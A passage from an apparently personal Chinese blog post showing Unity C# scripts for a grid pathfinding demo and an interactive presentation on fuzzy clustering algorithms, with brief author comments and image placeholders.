    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    90
    91
    92
    93
    94
    95
    96
    97
    98
    99
    100
    101
    102
    using System.Collections;
    using System.Collections.Generic;
    using UnityEngine;
    using CodeMonkey.Utils;
    using CodeMonkey;
    using UnityEngine.UI;

    public class Testing : MonoBehaviour {
    [SerializeField] private PathfindingDebugStepVisual pathfindingDebugStepVisual; // 算法可视化(分步走)
    [SerializeField] private PathfindingVisual pathfindingVisual; // 显示界面
    [SerializeField] private CharacterPathfindingMovementHandler characterPathfinding; // 角色行走

    [SerializeField] private Sprite King;
    [SerializeField] private Sprite Rook;
    [SerializeField] private Text mode;
    private Pathfinding pathfinding;
    [SerializeField] private List<GameObject> scenes;
    [SerializeField] private Text sceneIndex;
    private int currentScene = 0;

    private void Start() {
    pathfinding = new Pathfinding(8, 8, true);
    pathfindingDebugStepVisual.Setup(pathfinding.GetGrid());
    pathfindingVisual.SetGrid(pathfinding.GetGrid());
    }

    private void Update() {
    if (Input.GetMouseButtonDown(0)) {
    Vector3mouseWorldPosition = UtilsClass.GetMouseWorldPosition();
    pathfinding.GetGrid().GetXY(mouseWorldPosition, out int x, out int y);
    List<PathNode> path = pathfinding.FindPath(0, 0, x, y);
    if (path != null) {
    for (int i=0; i<path.Count - 1; i++) {
    Debug.DrawLine(new Vector3(path[i].x, path[i].y) * 10f + Vector3.one * 5f, new Vector3(path[i+1].x, path[i+1].y) * 10f + Vector3.one * 5f, Color.green, 5f);
    }
    }
    characterPathfinding.SetTargetPosition(mouseWorldPosition);
    }

    if (Input.GetMouseButtonDown(1)) {
    Vector3mouseWorldPosition = UtilsClass.GetMouseWorldPosition();
    pathfinding.GetGrid().GetXY(mouseWorldPosition, out int x, out int y);
    if(x >= 0 && y >= 0 && x < 8 && y < 8)
    pathfinding.GetNode(x, y).SetIsWalkable(!pathfinding.GetNode(x, y).isWalkable);
    }

    if(Input.GetKeyDown(KeyCode.Z))
    {
    pathfinding._8directions = !pathfinding._8directions;
    characterPathfinding.transform.Find("Chessman").GetComponent<SpriteRenderer>().sprite = pathfinding._8directions ? King : Rook;
    }
    if(Input.GetKeyDown(KeyCode.LeftArrow) || Input.GetKeyDown(KeyCode.A))
    {
    privousScene();
    }
    if (Input.GetKeyDown(KeyCode.RightArrow) || Input.GetKeyDown(KeyCode.D))
    {
    nextScene();
    }
    }
    public void changeMode()
    {
    if(pathfinding.mode == 1)
    {
    Debug.Log("changeMode()" + pathfinding.mode);
    mode.text = "Dijkstra";
    }
    if (pathfinding.mode == 2)
    {
    Debug.Log("changeMode()" + pathfinding.mode);
    mode.text = "BFS";
    }
    if (pathfinding.mode == 3)
    {
    Debug.Log("changeMode()" + pathfinding.mode);
    mode.text = "A*";
    }
    pathfinding.mode = pathfinding.mode % 3 + 1;
    }

    public void privousScene()
    {
    if (currentScene == 0)
    currentScene = scenes.Count - 1;
    else
    currentScene -= 1;
    sceneIndex.text = (currentScene + 1) + "/" + scenes.Count;
    for (int i = 0; i < scenes.Count; i++)
    {
    scenes[i].SetActive(i == currentScene);
    }
    }
    public void nextScene()
    {
    currentScene = (currentScene + 1) % scenes.Count;
    sceneIndex.text = (currentScene + 1) + "/" + scenes.Count;
    for (int i = 0; i < scenes.Count; i++)
    {
    scenes[i].SetActive(i == currentScene);
    }
    }
    }

    网格系统

    ​ 从 Grid System in Unity (How to make it and where to use it) - YouTube 抄的网格系统以及寻路算法。

    1

    jpg

    2

    jpg

    3

    jpg

    4

    jpg

    5

    jpg

    6

    jpg

    7

    jpg

    模糊聚类分析法

    ​ 老田不想上课让我们上去讲,我上去讲一讲练练手。

    ​ 这个时候已经有 ChatGPT 了,确实很提高效率,但是要讲的东西太复杂了,写了整整两天 orz。

    场景逻辑

    ​ 同样的场景切换逻辑,只有一个 Scene,一个 Prefab 代表一页 PPT。

    ​ 修改了鼠标指针。

    ​ 使用 Dotween 设计了场景切换的动画效果,但是好像路子有点野,有空再学吧!

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    90
    91
    92
    93
    94
    95
    96
    97
    using DG.Tweening;
    using System.Collections;
    using System.Collections.Generic;
    using UnityEngine;
    using UnityEngine.UI;

    public class SceneController : MonoBehaviour
    {
    [SerializeField] private Text indexText;
    [SerializeField] private GameObject scenes;
    private int index = 0;
    private int index_old = 1;

    private GameObject oldScene;
    private GameObject newScene;
    private float timer = 0f;
    private bool changing = false;
    private bool isLeft = false;

    public Texture2D cursorTexture;

    public void OnLeftButton()
    {
    if (changing) return;
    index--;
    if (index == 0)
    {
    index = 7;
    }
    UpdateScene();
    }
    public void OnRightButton()
    {
    if (changing) return;
    index++;
    if (index == 8)
    {
    index = 1;
    }
    UpdateScene();
    }
    private void UpdateScene()
    {
    indexText.text = index + "/7";
    for (int i = 0; i < 7; i++)
    {
    Debug.Log(scenes.transform.GetChild(i).name + "," + index.ToString());
    if (scenes.transform.GetChild(i).name == index.ToString())
    {
    newScene = scenes.transform.GetChild(i).gameObject;
    }
    else if (scenes.transform.GetChild(i).name == index_old.ToString())
    {
    oldScene = scenes.transform.GetChild(i).gameObject;
    }
    else
    {
    scenes.transform.GetChild(i).gameObject.SetActive(false);
    }
    }
    if (index_old < index)
    {
    isLeft = true;
    newScene.transform.GetComponent<RectTransform>().anchoredPosition = new Vector3(1000, 0, 0);
    }
    else
    {
    isLeft = false;
    newScene.transform.GetComponent<RectTransform>().anchoredPosition = new Vector3(-1000, 0, 0);
    }
    newScene.SetActive(true);
    index_old = index;
    timer = 2f;
    }
    // Start is called before the first frame update
    void Start()
    {
    Cursor.SetCursor(cursorTexture, Vector2.zero, CursorMode.Auto);
    index = 1;
    indexText.text = index + "/7";
    oldScene = scenes.transform.Find("1").gameObject;
    }

    // Update is called once per frame
    void Update()
    {
    if (timer > 0)
    {
    timer -= Time.deltaTime;
    if(isLeft) {
    oldScene.transform.DOLocalMove(new Vector2(-1000, 0), 2f);
    }else
    oldScene.transform.DOLocalMove(new Vector2(1000, 0), 2f);
    newScene.transform.DOLocalMove(new Vector2(0, 0), 2f);
    }
    }
    }

    1

    jpg

    2

    jpg

    基于模糊等价等价关系的聚类分析法

    ​ 代码复现以及前端效果,拖动 Slider 会改变 λ 的值,从而重新计算分类。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    90
    91
    92
    93
    94
    95
    96
    97
    98
    99
    100
    101
    102
    103
    104
    105
    106
    107
    108
    109
    110
    using Newtonsoft.Json.Linq;
    using System;
    using System.Collections;
    using System.Collections.Generic;
    using System.Linq;
    using UnityEngine;
    using UnityEngine.UI;

    public class Scene2Controller : MonoBehaviour
    {
    [SerializeField] private Slider slider;
    [SerializeField] private Text lambdaText;
    [SerializeField] private Text subText;
    [SerializeField] private GameObject Matrix1;
    [SerializeField] private GameObject Matrix2;
    [SerializeField] private Color colorSmaller;
    [SerializeField] private Color colorBigger;
    private double[,] R = new double[5, 5]{
    {1, 0.48, 0.62, 0.41, 0.47},
    {0.48, 1, 0.48, 0.41, 0.47},
    {0.62, 0.48, 1, 0.41, 0.47},
    {0.41, 0.41, 0.41, 1, 0.41},
    {0.47, 0.47, 0.47, 0.41, 1}
    };
    private int[,] R_lambda = new int[5, 5]{
    {1, 0, 0, 0, 0},
    {0, 1, 0, 0, 0},
    {0, 0, 1, 0, 0},
    {0, 0, 0, 1, 0},
    {0, 0, 0, 0, 1}
    };
    private double lambda;

    [SerializeField] private Text AnsText;
    Dictionary<string, List<int>> duplicateRows = new Dictionary<string, List<int>>();
    string rowString = "";
    string str = "";
    // Start is called before the first frame update
    void Start()
    {
    lambda = Math.Round(slider.value, 2);
    for (int i = 0; i < 25; i++)
    {
    Matrix1.transform.Find((i + 1).ToString()).Find("Text").GetComponent<Text>().text = R[i / 5, i % 5].ToString();
    }
    OnSliderValueChanged();
    }

    // Update is called once per frame
    void Update()
    {

    }
    public void OnSliderValueChanged()
    {
    // 更改数组
    lambda = Math.Round(slider.value, 2);
    lambdaText.text = "λ=" + lambda.ToString();
    subText.text = lambda.ToString();
    for (int i = 0; i < 25; i++)
    {
    if (R[i / 5, i % 5] < lambda)
    {
    R_lambda[i / 5, i % 5] = 0;
    Matrix1.transform.Find((i + 1).ToString()).GetComponent<Image>().color = colorSmaller;
    Matrix2.transform.Find((i + 1).ToString()).GetComponent<Image>().color = colorSmaller;
    }
    else
    {
    R_lambda[i / 5, i % 5] = 1;
    Matrix1.transform.Find((i + 1).ToString()).GetComponent<Image>().color = colorBigger;
    Matrix2.transform.Find((i + 1).ToString()).GetComponent<Image>().color = colorBigger;
    }
    Matrix2.transform.Find((i + 1).ToString()).Find("Text").GetComponent<Text>().text = R_lambda[i / 5, i % 5].ToString();
    }
    // 输出答案
    duplicateRows = new Dictionary<string, List<int>>();
    for (int i = 0; i < R_lambda.GetLength(0); i++)
    {
    rowString = "";
    for (int j = 0; j < R_lambda.GetLength(1); j++)
    {
    rowString += R_lambda[i, j].ToString() + ",";
    }
    if (duplicateRows.ContainsKey(rowString))
    {
    duplicateRows[rowString].Add(i);
    }
    else
    {
    duplicateRows.Add(rowString, new List<int> { i });
    }
    }

    str = "此时分成 " + duplicateRows.Count + " 类:";

    foreach (KeyValuePair<string, List<int>> kvp in duplicateRows)
    {
    str += "{";
    foreach (int row in kvp.Value)
    {
    str += "x" + (row + 1).ToString() + ",";
    }
    str = str.Remove(str.Length - 1);
    str += "}";
    }

    AnsText.text = str;
    }
    }

    3

    jpg

    基于模糊相似关系的截距阵分类法

    ​ 用 ChatGPT 抄了个 FuzzyMatrixMultiplication()

    ​ 点击石头可以改变 k 的值。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    90
    91
    92
    93
    94
    95
    96
    97
    98
    99
    100
    101
    102
    103
    104
    105
    106
    107
    108
    109
    110
    111
    112
    113
    114
    115
    116
    117
    118
    119
    120
    121
    122
    123
    124
    125
    126
    127
    128
    129
    130
    131
    132
    133
    134
    135
    136
    137
    138
    139
    140
    141
    142
    143
    144
    145
    146
    147
    148
    149
    150
    151
    152
    153
    154
    155
    156
    157
    158
    159
    160
    161
    162
    163
    164
    165
    166
    167
    using System;
    using System.Collections;
    using System.Collections.Generic;
    using UnityEngine;
    using UnityEngine.UI;

    public class Scene3Controller : MonoBehaviour
    {
    [SerializeField] private Slider slider;
    [SerializeField] private Text lambdaText;
    [SerializeField] private Text subText;
    [SerializeField] private GameObject Matrix1;
    [SerializeField] private GameObject Matrix2;
    [SerializeField] private GameObject Matrix3;
    [SerializeField] private Color colorSmaller;
    [SerializeField] private Color colorBigger;
    private double[,] R = new double[5, 5]{
    {1, 0.8, 0, 0.1, 0.2},
    {0.8, 1, 0.4, 0, 0.9},
    {0, 0.4, 1, 0, 0},
    {0.1, 0, 0, 1, 0.5},
    {0.2, 0.9, 0, 0.5, 1}
    };
    private double[,] R_k = new double[5, 5]{
    {1, 0.8, 0, 0.1, 0.2},
    {0.8, 1, 0.4, 0, 0.9},
    {0, 0.4, 1, 0, 0},
    {0.1, 0, 0, 1, 0.5},
    {0.2, 0.9, 0, 0.5, 1}
    };
    private int[,] R_lambda = new int[5, 5]{
    {1, 0, 0, 0, 0},
    {0, 1, 0, 0, 0},
    {0, 0, 1, 0, 0},
    {0, 0, 0, 1, 0},
    {0, 0, 0, 0, 1}
    };
    private double lambda;

    private int k = 1;
    [SerializeField] private Text kText;
    [SerializeField] private GameObject Stones;
    [SerializeField] private Text supText;
    [SerializeField] private Text supText2;

    [SerializeField] private Text AnsText;
    Dictionary<string, List<int>> duplicateRows = new Dictionary<string, List<int>>();
    string rowString = "";
    string str = "";
    // Start is called before the first frame update
    void Start()
    {
    lambda = Math.Round(slider.value, 2);
    for (int i = 0; i < 25; i++)
    {
    Matrix1.transform.Find((i + 1).ToString()).Find("Text").GetComponent<Text>().text = R[i / 5, i % 5].ToString();
    }
    OnChangeK();
    }

    // Update is called once per frame
    void Update()
    {

    }
    public void OnChangeK()
    {
    k *= 2;
    if (k == 16) { k = 1; }
    kText.text = "k=" + k;
    supText.text = supText2.text = k.ToString();
    for (int i = 1; i < 5; i++)
    {
    if (Math.Pow(2, i - 1)<=k)
    Stones.transform.Find("Stone" + (i).ToString()).GetComponent<Image>().color= Color.yellow;
    else
    Stones.transform.Find("Stone" + (i).ToString()).GetComponent<Image>().color = Color.white;
    }
    OnSliderValueChanged();
    }
    public double[,] FuzzyMatrixMultiplication(double[,] matrix, int k)
    {
    double[,] result = (double[,])matrix.Clone(); // 复制一份 matrix
    for (int i = 2; i <= k; i++)
    {
    double[,] temp = new double[matrix.GetLength(0), matrix.GetLength(1)];
    for (int j = 0; j < matrix.GetLength(0); j++)
    {
    for (int l = 0; l < matrix.GetLength(1); l++)
    {
    double temp2 = 0;
    for (int m = 0; m < matrix.GetLength(1); m++)
    {
    double fuzzyValue = Math.Min(result[j, m], matrix[m, l]);
    temp2 = Math.Max(fuzzyValue, temp2);
    }
    temp[j, l] = temp2;
    }
    }
    result = (double[,])temp.Clone(); // 将 temp 的值赋给 result
    }
    return result;
    }
    public void OnSliderValueChanged()
    {
    // 更改数组
    lambda = Math.Round(slider.value, 2);
    lambdaText.text = "λ=" + lambda.ToString();
    subText.text = lambda.ToString();
    for (int i = 0; i < 25; i++)
    {
    if (R_k[i / 5, i % 5] < lambda)
    {
    R_lambda[i / 5, i % 5] = 0;
    Matrix2.transform.Find((i + 1).ToString()).GetComponent<Image>().color = colorSmaller;
    Matrix3.transform.Find((i + 1).ToString()).GetComponent<Image>().color = colorSmaller;
    }
    else
    {
    R_lambda[i / 5, i % 5] = 1;
    Matrix2.transform.Find((i + 1).ToString()).GetComponent<Image>().color = colorBigger;
    Matrix3.transform.Find((i + 1).ToString()).GetComponent<Image>().color = colorBigger;
    }
    Matrix3.transform.Find((i + 1).ToString()).Find("Text").GetComponent<Text>().text = R_lambda[i / 5, i % 5].ToString();
    }

    R_k = FuzzyMatrixMultiplication(R, k);
    for (int i = 0; i < 25; i++)
    {
    Matrix2.transform.Find((i + 1).ToString()).Find("Text").GetComponent<Text>().text = R_k[i / 5, i % 5].ToString();
    }

    // 输出答案
    duplicateRows = new Dictionary<string, List<int>>();
    for (int i = 0; i < R_lambda.GetLength(0); i++)
    {
    rowString = "";
    for (int j = 0; j < R_lambda.GetLength(1); j++)
    {
    rowString += R_lambda[i, j].ToString() + ",";
    }
    if (duplicateRows.ContainsKey(rowString))
    {
    duplicateRows[rowString].Add(i);
    }
    else
    {
    duplicateRows.Add(rowString, new List<int> { i });
    }
    }

    str = "此时分成 " + duplicateRows.Count + " 类:";

    foreach (KeyValuePair<string, List<int>> kvp in duplicateRows)
    {
    str += "{";
    foreach (int row in kvp.Value)
    {
    str += "x" + (row + 1).ToString() + ",";
    }
    str = str.Remove(str.Length - 1);
    str += "}";
    }

    AnsText.text = str;
    }
    }

    4

    jpg

    模糊相似关系直接用于分类

    ​ 这部分没有对算法进行复现,直接面向结果编程了。

    ​ 同样地,拖动 Slider 改变 λ 的值。

    ​ 按下小铅笔绘制最大树。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    using System;
    using System.Collections;
    using System.Collections.Generic;
    using System.Numerics;
    using UnityEngine;
    using UnityEngine.UI;

    public class Scece4Controller : MonoBehaviour
    {
    [SerializeField] private Slider slider;
    [SerializeField] private Text lambdaText;
    [SerializeField] private Color matrixColor;
    [SerializeField] private GameObject Edges;
    private double mu = 1;
    private double lambda;
    private double[,] R = new double[8, 8]{
    {1, 0, 0, 0, 0.5, 0, 0.4, 0},
    {0, 1, 0, 0.8, 0, 0.8, 0.2, 0.5},
    {0, 0, 1, 0, 0.2, 0, 0.2, 0.2},
    {0, 0.8, 0, 1, 0, 0.4, 0, 0 },
    {0.5, 0, 0.2, 0, 1, 0, 0.8, 0 },
    {0, 0.8, 0,0.4, 0,1,0,0.8 },
    {0.4, 0.2, 0.2, 0, 0.8,0,1,0 },
    {0,0.5,0.2,0,0,0.8,0,1 }
    };
    [SerializeField] private GameObject Matrix;
    // Start is called before the first frame update
    void Start()
    {
    lambda = Math.Round(slider.value, 2);
    for (int i = 0; i < 64; i++)
    {
    Matrix.transform.Find((i + 1).ToString()).Find("Text").GetComponent<Text>().text = R[i / 8, i % 8].ToString();
    if(i / 8 >= i % 8)
    {
    Matrix.transform.Find((i + 1).ToString()).GetComponent<Image>().color = matrixColor;
    }
    }
    OnSliderValueChanged();
    }
    public void OnDrawButton()
    {
    if (mu == 1)
    mu = 0.8;
    else if (mu == 0.8)
    mu = 0.5;
    else if (mu == 0.5)
    mu = 0.4;
    else if (mu == 0.4)
    mu = 0.2;
    else
    mu = 1;
    UpdateUI();
    }
    public void OnSliderValueChanged()
    {
    lambda = Math.Round(slider.value, 2);
    lambdaText.text = "λ=" + lambda;
    UpdateUI();
    }
    void UpdateUI()
    {
    for (int i = 0; i < Edges.transform.childCount; i++)
    {
    double temp = double.Parse(Edges.transform.GetChild(i).name.Split(' ')[1]);
    if (temp >= mu && temp >= lambda)
    {
    Edges.transform.GetChild(i).gameObject.SetActive(true);
    }
    else
    Edges.transform.GetChild(i).gameObject.SetActive(false);
    }
    }
    // Update is called once per frame
    void Update()
    {

    }
    }

    5

    jpg

    模糊 K-均值算法

    ​ 按下按钮更改 L 的值。

    ​ 记得这里在前端琢磨了好久,因为没有想到好的方法来转换游戏空间坐标与图像坐标。

    ​ 最后还是写个了很粗糙的方法,没用上 Dotween。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    90
    91
    92
    93
    94
    95
    96
    97
    98
    99
    100
    101
    102
    103
    104
    105
    106
    107
    108
    109
    110
    111
    112
    113
    114
    115
    116
    117
    118
    119
    120
    121
    122
    123
    124
    125
    126
    127
    128
    129
    130
    131
    132
    133
    134
    135
    136
    137
    138
    139
    140
    141
    142
    143
    144
    145
    146
    147
    148
    149
    150
    151
    152
    153
    154
    155
    156
    157
    158
    159
    160
    161
    162
    163
    164
    165
    166
    167
    168
    169
    170
    171
    172
    173
    174
    175
    176
    177
    178
    179
    180
    181
    182
    183
    184
    185
    186
    187
    188
    189
    190
    191
    192
    193
    194
    195
    196
    197
    198
    199
    200
    201
    202
    203
    204
    205
    206
    207
    208
    209
    210
    211
    212
    213
    214
    using DG.Tweening;
    using Newtonsoft.Json.Linq;
    using System;
    using System.Collections;
    using System.Collections.Generic;
    using System.Threading;
    using UnityEngine;
    using UnityEngine.UI;
    using static UnityEngine.UI.Image;

    public class Scene5Controller : MonoBehaviour
    {
    [SerializeField] private GameObject Matrix1;
    [SerializeField] private GameObject Matrix2;
    [SerializeField] private GameObject Matrix3;
    [SerializeField] private Text LText;
    [SerializeField] private Text CondictionText;
    [SerializeField] private Color originColor;
    [SerializeField] private Color matrixColor;
    private int x = 0;
    private int y = 0;

    [SerializeField] private Text U_1_Text;
    [SerializeField] private Text U_Text;
    [SerializeField] private GameObject Z_1GameObject;
    [SerializeField] private GameObject Z_2GameObject;

    private Vector3 Z_1_old_position = Vector3.zero;
    private Vector3 Z_1_new_position = Vector3.zero;
    private Vector3 Z_2_old_position = Vector3.zero;
    private Vector3 Z_2_new_position = Vector3.zero;
    private float timer = 0;

    private int L = 0;
    private double[,] X = new double[4, 2]
    {
    {0, 0 },
    {0, 1 },
    {3, 1 },
    {3, 2 },
    };
    private double[] Z_1 = new double[] { 1.84, 1.84 };
    private double[] Z_2 = new double[] {2.84, 1.84};
    private double[,] U = new double[2, 4]{
    {0.9, 0.8, 0.7, 0.1},
    {0.1, 0.2, 0.3, 0.9},
    };
    private double[,] U_L_1 = new double[2, 4]{
    {0.9, 0.8, 0.7, 0.1},
    {0.1, 0.2, 0.3, 0.9},
    };
    private double[,] U_L = new double[2, 4]{
    {0.9, 0.8, 0.7, 0.1},
    {0.1, 0.2, 0.3, 0.9},
    };
    public void OnIncreseL()
    {
    L += 1;
    if(L == 7)
    {
    L = 1;
    }
    LText.text = "L=" + L;
    Calc();
    UpdateUI();
    }
    public void OnDecreseL()
    {
    L -= 1;
    if (L == 0)
    {
    L = 6;
    }
    LText.text = "L=" + L;
    Calc();
    UpdateUI();
    }
    public void Calc()
    {
    double[,] temp = new double[U.GetLength(0), U.GetLength(1)];
    for (int i = 0; i < U.GetLength(0); i++)
    {
    for (int j = 0; j < U.GetLength(1); j++)
    {
    temp[i, j] = U[i, j];
    }
    }
    for (int i = 0; i < L; i++) // 重复 L 次
    {
    // Debug.Log("i=" + i +" ********************");
    for (int k = 0; k < 4; k++)
    {
    U_L_1[0, k] = temp[0, k];
    U_L_1[1, k] = temp[1, k];
    // Debug.Log(Math.Round(U_L_1[0, k], 2) + ", " + Math.Round(U_L_1[1, k], 2));
    }
    ////////////////// 计算 Z1
    double dividend_x_1 = 0; // 被除数 x
    double dividend_y_1 = 0; // 被除数 y
    double dvider_1 = 0; // 除数

    double dividend_x_2 = 0; // 被除数 x
    double dividend_y_2 = 0; // 被除数 y
    double dvider_2 = 0; // 除数
    for (int j = 0; j < 4; j++) // 遍历第 0 行
    {
    dvider_1 += temp[0, j] * temp[0, j];
    dividend_x_1 += X[j, 0] * temp[0, j] * temp[0, j];
    dividend_y_1 += X[j, 1] * temp[0, j] * temp[0, j];

    dvider_2 += temp[1, j] * temp[1, j];
    dividend_x_2 += X[j, 0] * temp[1, j] * temp[1, j];
    dividend_y_2 += X[j, 1] * temp[1, j] * temp[1, j];
    }
    // 更新聚类中心
    Z_1[0] = dividend_x_1 / dvider_1;
    Z_1[1] = dividend_y_1 / dvider_1;
    Z_2[0] = dividend_x_2 / dvider_2;
    Z_2[1] = dividend_y_2 / dvider_2;
    // Debug.Log("迭代次数 " + i + " 聚类中心:(" + Z_1[0] + "," + Z_1[1] + "),(" + Z_2[0] + "," + Z_2[1] + ")");
    // 计算距离, 更新矩阵
    double d1;
    double d2;
    for (int k = 0; k < 4; k++)
    {
    // Debug.Log("---------------------");
    // Debug.Log("X" + (k + 1) + ": " + X[k, 0] + ", " + X[k, 1]);
    d1 = (X[k, 0] - Z_1[0]) * (X[k, 0] - Z_1[0]) + (X[k, 1] - Z_1[1]) * (X[k, 1] - Z_1[1]);
    d2 = (X[k, 0] - Z_2[0]) * (X[k, 0] - Z_2[0]) + (X[k, 1] - Z_2[1]) * (X[k, 1] - Z_2[1]);
    temp[0, k] = 1 / (1 + d1 / d2);
    temp[1, k] = 1 / (1 + d2 / d1);
    // Debug.Log(Math.Round(temp[0, k], 2) + ", " + Math.Round(temp[1, k], 2));
    }
    }
    // Debug.Log("!!!!!!!!!!!!!!!!");
    for (int k = 0; k < 4; k++)
    {
    U_L[0, k] = temp[0, k];
    U_L[1, k] = temp[1, k];
    // Debug.Log(Math.Round(U_L[0, k], 2) + ", " + Math.Round(U_L[1, k], 2));
    }
    }
    public void UpdateUI()
    {
    Matrix2.transform.Find((x * 4 + y + 1).ToString()).GetComponent<Image>().color = originColor;
    Matrix3.transform.Find((x * 4 + y + 1).ToString()).GetComponent<Image>().color = originColor;
    U_1_Text.text = "U(" + (L - 1).ToString() + ")=";
    U_Text.text = "U(" + L + ")=";

    for (int i = 0; i < 4; i++)
    {
    Matrix2.transform.Find((i + 1).ToString()).Find("Text").GetComponent<Text>().text = Math.Round(U_L_1[0, i], 2).ToString();
    Matrix2.transform.Find((i + 5).ToString()).Find("Text").GetComponent<Text>().text = Math.Round(U_L_1[1, i], 2).ToString();
    Matrix3.transform.Find((i + 1).ToString()).Find("Text").GetComponent<Text>().text = Math.Round(U_L[0, i], 2).ToString();
    Matrix3.transform.Find((i + 5).ToString()).Find("Text").GetComponent<Text>().text = Math.Round(U_L[1, i], 2).ToString();
    }
    double max = 0;

    for (int i = 0; i < U.GetLength(0); i++)
    {
    for (int j = 0; j < U.GetLength(1); j++)
    {
    if (max < Math.Abs(U_L_1[i, j] - U_L[i, j]))
    {
    max = Math.Abs(U_L_1[i, j] - U_L[i, j]);
    x = i;
    y = j;
    }
    }
    }
    CondictionText.text = Math.Round(max, 6).ToString();

    Matrix2.transform.Find((x * 4 + y + 1).ToString()).GetComponent<Image>().color = matrixColor;
    Matrix3.transform.Find((x * 4 + y + 1).ToString()).GetComponent<Image>().color = matrixColor;

    Z_1_old_position = Z_1GameObject.transform.localPosition;
    Z_2_old_position = Z_2GameObject.transform.localPosition;

    Z_1GameObject.transform.Find("Text").GetComponent<Text>().text = "Z1=(" + Math.Round(Z_1[0], 2) + ", " + Math.Round(Z_1[1],2) + ")T";
    Z_1_new_position = new Vector3((float)(120 * Math.Round(Z_1[0], 2)), (float)(120 * Math.Round(Z_1[1], 2)), 0);
    // Z_1GameObject.transform.localPosition = Z_1_new_position;

    Z_2GameObject.transform.Find("Text").GetComponent<Text>().text = "Z2=(" + Math.Round(Z_2[0], 2) + ", " + Math.Round(Z_2[1],2) + ")T";
    Z_2_new_position = new Vector3((float)(120 * Math.Round(Z_2[0], 2)), (float)(120 * Math.Round(Z_2[1], 2)), 0);
    // Z_2GameObject.transform.localPosition = Z_2_new_position;
    timer = 0.5f;


    }
    // Start is called before the first frame update
    void Start()
    {
    for (int i = 0; i < 4; i++)
    {
    Matrix1.transform.Find((i + 1).ToString()).Find("Text").GetComponent<Text>().text = Math.Round(U[0, i], 2).ToString();
    Matrix1.transform.Find((i + 5).ToString()).Find("Text").GetComponent<Text>().text = Math.Round(U[1, i], 2).ToString();
    }
    L = 0;
    Z_1_old_position = Z_1GameObject.transform.localPosition;
    Z_2_old_position = Z_2GameObject.transform.localPosition;
    OnIncreseL();
    }

    // Update is called once per frame
    void Update()
    {
    if (timer > 0)
    {
    timer -= Time.deltaTime;
    Z_1GameObject.transform.localPosition = Z_1_old_position + (Z_1_new_position - Z_1_old_position) * (1 - timer) * (1 - timer);
    Z_2GameObject.transform.localPosition = Z_2_old_position + (Z_2_new_position - Z_2_old_position) * (1 - timer) * (1 - timer);
    }
    }
    }

    6

    jpg

    模糊 ISODATA 算法

    ​ 这块计算量太大了,而且比较复杂,我没咋理解,更不会可视化了……

    ​ 用 ChatGPT 帮忙写了一个 Python 版本的,用 Jupyter Notebook 确实能跑,但是稍微改一点参数就不能跑了,不过老田估计也不懂就鬼混过去了嘻嘻嘻。

    ​ 把之前的代码滚动框抄了回去。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    90
    91
    92
    93
    94
    95
    96
    97
    98
    99
    100
    101
    102
    103
    104
    105
    106
    107
    108
    109
    110
    111
    112
    113
    114
    115
    116
    117
    118
    119
    120
    121
    122
    123
    124
    125
    126
    127
    128
    129
    130
    131
    <color="#FF8800">import numpy as np
    </color>

    <color="#00FFFF">class FuzzyISODATA</color>():
    <color="#dcdcaa">def __init__(self, data, k, max_iter, min_samples=1, max_samples=None)</color>:
    self.data = data <color="#57a64a"># 输入的样本数据</color>
